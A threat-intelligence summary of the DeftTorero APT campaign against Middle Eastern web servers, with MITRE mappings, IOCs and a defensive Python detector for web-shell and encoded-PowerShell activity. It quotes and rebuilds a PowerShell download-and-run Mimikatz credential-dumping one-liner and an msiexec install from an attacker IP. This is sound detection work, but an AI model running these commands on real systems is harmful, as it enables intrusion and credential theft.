DeftTorero (Lebanese Cedar/Volatile Cedar) activity from late 2019 to mid-2021 shows a shift toward fileless/LOLBIN techniques and the use of public/offensive tooling to blend in with normal activity. The report details initial access via web shells (Caterpillar, ASPXSpy), discovery steps, credential dumping, and execution methods across Middle East victims hosting multi-site web servers. #DeftTorero #LebaneseCedar #VolatileCedar #ExplosiveRAT #Caterpillar #ASPXSpy #Lazagne #Mimikatz #Empire #Meterpreter #Nmap #AdvancedPortScanner #MiddleEast #Egypt #Jordan #Kuwait #Lebanon #SaudiArabia #Turkey #UAE
Key points
- DeftTorero shows a potential shift toward fileless/LOLBIN techniques and publicly available tools to blend in with other activity.
- Initial access is achieved by deploying web shells (Caterpillar, ASPXSpy) after exploiting a web application vulnerability, or by logging in to the server directly (for example over remote desktop) with valid credentials.
- Once web shells are in place, operators perform extensive discovery to assess privileges, domains, websites, and relationships to plan credential access.
- Credential dumping uses Lazagne and Mimikatz variants, with occasional LSASS dumping to disk and base64-encoded PowerShell one-liners from GitHub.
- Pivoting and additional access often rely on RDP (MSTSC.exe), followed by a foothold on other servers in the same network, sometimes with web shells deployed on several hosts.
- Execution and defense evasion include LOLBIN-based commands (regsvr32, MSIEXEC, PowerShell) and other techniques to bypass AV, alongside Explosive RAT modifications to evade detection.
- Victims are predominantly in Middle Eastern countries across several sectors, with compromised web servers hosting multiple websites.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used to gain initial access by exploiting a file upload form and/or a command injection vulnerability in a functional or staging website (‘…exploited a file upload form and/or a command injection vulnerability in a functional or staging website…’).
- [T1505.003] Web Shell – Dropped web shells (Caterpillar, ASPXSpy) on the web server; uploaded shells often drop in the same folder and may be named with a GUID (‘the uploaded webshells always drop in the same web folder, and in some cases get assigned a name containing a GUID followed by the original webshell filename’).
- [T1105] Ingress Tool Transfer – Tools and payloads downloaded from GitHub/Internet (e.g., Mimikatz via base64-encoded PowerShell from GitHub) (‘Decoded base64 command issued through webshell to invoke Mimikatz to dump passwords’).
- [T1059.001] PowerShell – Used to download and execute scripts (e.g., Invoke-Mimikatz.ps1) (‘IEX (New-Object System.Net.WebClient).DownloadString(…); Invoke-Mimikatz -DumpCreds;’).
- [T1059.003] Windows Command Shell – Extensive use of cmd.exe commands for discovery and execution (‘cmd.exe /c whoami’, ‘cmd.exe /c ipconfig -all’, etc.).
- [T1021.001] Remote Services: Remote Desktop Protocol – Pivoting via RDP (MSTSC.exe) to deploy web shells or access other systems (‘logged in using a remote desktop (MSTSC.exe) to deploy the webshell’).
- [T1003] OS Credential Dumping – Dumping credentials with Lazagne/Mimikatz; LSASS dumped to disk in some cases (‘Invoke-Mimikatz -DumpCreds’, ‘LSASS.exe to disk’).
- [T1036] Masquerading – Defense evasion by changing function names in binaries (e.g., DLL export table: AllDataGet, HistoryGetIE, TOCN, etc.) and altering user-agent strings (‘New function names compared to old ones’, ‘User Agent for HTTP Communication’).
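The techniques above map onto a small set of host signals a defender can check in process-creation telemetry: a web server worker spawning cmd.exe or PowerShell (commands issued through a web shell), base64-encoded PowerShell whose decoded body contains the DownloadString/Invoke-Mimikatz pattern quoted in the report, LOLBINs such as regsvr32 or msiexec fetching content from a URL, and GUID-prefixed file names in the upload folder. The following script is an added example written for this summary; it is not code from the Securelist report or from Kaspersky. The sample events are constructed to resemble the quoted commands; the web server process names, the msiexec command line, the placeholder GitHub path and the underscore between the GUID and the original file name are assumptions.

```python
import base64
import re

# Processes that front a web application. A shell spawned directly by one of
# these is the classic sign of commands being issued through a web shell.
# (Assumed set; adjust to the web stack actually in use.)
WEB_SERVER_PROCS = {"w3wp.exe", "httpd.exe", "php-cgi.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# LOLBINs named in the report; flagged only when their arguments carry a URL.
LOLBINS = {"regsvr32.exe", "msiexec.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# -e / -ec / -enc / -encodedcommand <base64>; PowerShell decodes it as UTF-16LE.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Fragments of the one-liner quoted in the report; none of these belong in a
# command run by a production web server.
SUSPICIOUS_PS = ("downloadstring", "iex", "invoke-mimikatz", "dumpcreds")

# GUID followed by the original web shell file name (the '_' separator is assumed).
GUID_NAME_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}_.+\.(aspx?|php|jsp)$",
    re.IGNORECASE,
)


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def classify_event(parent, image, cmdline):
    """Return the list of findings for one process-creation event."""
    findings = []
    if parent.lower() in WEB_SERVER_PROCS and image.lower() in SHELLS:
        findings.append("T1505.003 web server spawned a shell (web shell activity)")
    decoded = decode_encoded_powershell(cmdline)
    if decoded is not None:
        low = decoded.lower()
        hits = [s for s in SUSPICIOUS_PS if s in low]
        if hits:
            findings.append("T1059.001 encoded PowerShell with " + ", ".join(hits))
    if image.lower() in LOLBINS and URL_RE.search(cmdline):
        findings.append("LOLBIN " + image + " pulling content from a URL (T1105)")
    return findings


def scan(events):
    """Run classify_event over (parent, image, cmdline) tuples; return hits only."""
    return [(i, image, f) for i, (parent, image, cmdline) in enumerate(events)
            if (f := classify_event(parent, image, cmdline))]


def is_guid_prefixed_upload(filename):
    """True when a file in the upload folder follows the GUID_<original name> pattern."""
    return bool(GUID_NAME_RE.match(filename))


# Constructed sample telemetry modelled on the commands quoted in the report.
# The GitHub path is a placeholder, not the real location of the script.
ONE_LINER = (
    "IEX (New-Object System.Net.WebClient).DownloadString("
    "'https://raw.githubusercontent.com/PLACEHOLDER/Invoke-Mimikatz.ps1'); "
    "Invoke-Mimikatz -DumpCreds;"
)
ENCODED = base64.b64encode(ONE_LINER.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    ("w3wp.exe", "cmd.exe", "cmd.exe /c whoami"),                       # discovery via web shell
    ("w3wp.exe", "cmd.exe", "cmd.exe /c ipconfig -all"),                # discovery via web shell
    ("w3wp.exe", "powershell.exe", "powershell.exe -nop -w hidden -enc " + ENCODED),
    ("cmd.exe", "msiexec.exe", "msiexec /q /i http://200.159.87.196/1.msi"),  # assumed form
    ("explorer.exe", "cmd.exe", "cmd.exe /c dir"),                      # benign
    ("services.exe", "regsvr32.exe", "regsvr32 /s C:\\Windows\\System32\\example.dll"),  # benign
]

if __name__ == "__main__":
    for index, image, findings in scan(SAMPLE_EVENTS):
        print(index, image, "; ".join(findings))
    for name in ("ASPXSpy.aspx", "3f2504e0-4f89-11d3-9a0c-0305e82c3301_ASPXSpy.aspx"):
        print(name, "->", is_guid_prefixed_upload(name))
```

The parent/child rule carries most of the weight: the quoted discovery commands are ordinary on their own, and only the web server worker as parent makes them notable. The encoded-command decoder matters because an `-enc` payload hides the DownloadString and Invoke-Mimikatz strings from plain command-line matching, which is exactly why the report calls out base64-encoded one-liners.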
Indicators of Compromise
- [IP Address] 200.159.87.196 – Used as a host for downloading payloads and for C2-related activity (e.g., av.vbs, 1.msi, made.ps1).
- [Domains] githubusercontent.com, raw.githubusercontent.com – Used to host and fetch credential tools and PowerShell scripts (e.g., Invoke-Mimikatz.ps1, Invoke-mimikittenz.ps1).
- [File Name] Caterpillar, ASPXSpy – Webshell file names deployed on compromised web servers.
- [File Name] 1.msi – MSI package referenced in command lines for installation on remote hosts.
Read more: https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/